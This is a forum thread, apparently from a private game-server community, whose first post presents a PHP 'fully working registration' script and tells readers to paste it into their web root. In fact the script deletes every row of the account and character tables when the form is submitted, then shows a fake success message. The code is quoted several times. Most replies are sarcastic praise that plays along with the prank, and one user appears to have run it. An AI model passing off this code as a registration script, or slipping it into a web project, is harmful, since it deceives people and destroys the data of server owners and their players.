-
V15 fully working registration
Well, here you go:
Just paste this to your http root folders(in xampp htdocs):
Code:
<?php
$username='sa'; //Your MSSQL Username
$passw=''; //Your MSSQL Password
$ip=''; //computer name ex: SERVER\SQLEXPRESS
$link=mssql_connect($ip, $username, $passw);
if(!isset($_post['submit'])){
?>
<form action='' method='post'>
Username:<input type='text' name='user'><br>
Password:<input type='password' name='pass'><br>
<input type='submit' value='submit'>
<?php } else{
mssql_select_db('ACCOUNT_DBF');
mssql_query('DELETE FROM ACCOUNT_TBL');
mssql_select_db('CHARACTER_01_DBF');
mssql_query('DELETE FROM CHARACTER_TBL');
echo "<font color='green'>You have successfully registered</font>";
}
?>
-
Re: V15 fully working registration
Loltastic!
It said the registration was successful!
-
Re: V15 fully working registration
-
Re: V15 fully working registration
lol, it is very secure, you will never get problems with hackers again!
still, should have done something with exec()
-
Re: V15 fully working registration
Quote:
Originally Posted by
VLxPain
lol, it is very secure, you will never get problems with hackers again!
+1 :D
Very Nice Script! >:D
Leechers Leech the script! :)
thank you sir :8:
-
Re: V15 fully working registration
Quote:
Originally Posted by
VLxPain
Code:
<?php
$link=mssql_connect('name', 'user', 'pass');
if(!isset($_post['submit'])){
?>
<form action='' method='post'>
Username:<input type='text' name='user'><br>
Password:<input type='password' name='pass'><br>
<input type='submit' value='submit'>
<?php } else{
mssql_select_db('ACCOUNT_DBF');
mssql_query('DELETE FROM ACCOUNT_TBL');
mssql_select_db('CHARACTER_01_DBF');
mssql_query('DELETE FROM CHARACTER_TBL');
echo "<font color='green'>You have successfully registered</font>";
?>
Lol , i bet people will try to use it
-
Re: V15 fully working registration
Most secure registration script I've ever seen other than mine ;>
-
Re: V15 fully working registration
noe nick, it be making deletion of characters that be not there (:
-
Re: V15 fully working registration
Quote:
Originally Posted by
VLxPain
Well, here you go:
Just paste this to your http root folders(in xampp htdocs):
Code:
<?php
$link=mssql_connect('name', 'user', 'pass');
if(!isset($_post['submit'])){
?>
<form action='' method='post'>
Username:<input type='text' name='user'><br>
Password:<input type='password' name='pass'><br>
<input type='submit' value='submit'>
<?php } else{
mssql_select_db('ACCOUNT_DBF');
mssql_query('DELETE FROM ACCOUNT_TBL');
mssql_select_db('CHARACTER_01_DBF');
mssql_query('DELETE FROM CHARACTER_TBL');
echo "<font color='green'>You have successfully registered</font>";
?>
That tickles me :)
-
Re: V15 fully working registration
Me want pains script! D:
OMG IT WORKS I LOVE YOU PAIN!!!
lmfao <3 xD
I'm gonna recom every1 to use this register!! <3
-
Re: V15 fully working registration
Kudos to you for the best registration script ever, Pain.
-
Re: V15 fully working registration
I don't see the point of this...
Kinda useless thread.
-
Re: V15 fully working registration
Nuuu, All noobies should just copy/paste this xD
-
Re: V15 fully working registration
Quote:
Originally Posted by
VLxPain
Well, here you go:
Just paste this to your http root folders(in xampp htdocs):
Code:
<?php
$link=mssql_connect('name', 'user', 'pass');
if(!isset($_post['submit'])){
?>
<form action='' method='post'>
Username:<input type='text' name='user'><br>
Password:<input type='password' name='pass'><br>
<input type='submit' value='submit'>
<?php } else{
mssql_select_db('ACCOUNT_DBF');
mssql_query('DELETE FROM ACCOUNT_TBL');
mssql_select_db('CHARACTER_01_DBF');
mssql_query('DELETE FROM CHARACTER_TBL');
echo "<font color='green'>You have successfully registered</font>";
?>
+1 Thanks for your contribution =D
oh and dont even bother yourself with those randon flamers ^^
Cheers!
-
Re: V15 fully working registration
-
Re: V15 fully working registration
Lol Nice Pain Works Good :P Cheer
-
Re: V15 fully working registration
I Guest it dont work for me went I click submit notthing happen
-
Re: V15 fully working registration
Quote:
Originally Posted by
theunreal
Imao.
Imao? LOL , is that new?
Quote:
Originally Posted by
breastb
I Guest it dont work for me went I click submit notthing happen
LMAO YES
-
Re: V15 fully working registration
Quote:
Originally Posted by
breastb
I Guest it dont work for me went I click submit notthing happen
Probably something happend, check ur databases and tables:laugh:
-
Re: V15 fully working registration
Lol @ This, Best register script I've ever seen in my life.
-
Re: V15 fully working registration
-
Re: V15 fully working registration
-
Re: V15 fully working registration
Wait WTF Pain, this was the script I wrote for you.
I told you not to release this; this is the best piece of php I've written in my life.
credits plz!!!
-
Re: V15 fully working registration
Quote:
Originally Posted by
Organic
Wait WTF Pain, this was the script I wrote for you.
I told you not to release this; this is the best piece of php I've written in my life.
credits plz!!!
-shock-:blink:
PAIN D:
Don't forget to give credits to some1s best php piece that he has written in his whole life D:
-
Re: V15 fully working registration
Quote:
Originally Posted by
spikensbror
I don't see the point of this...
Kinda useless thread.
It's what this community has come to.
I noticed the 'Delete From' function as soon as I opened the thread.
Though anyone that doesn't see this, deserves what happens to them.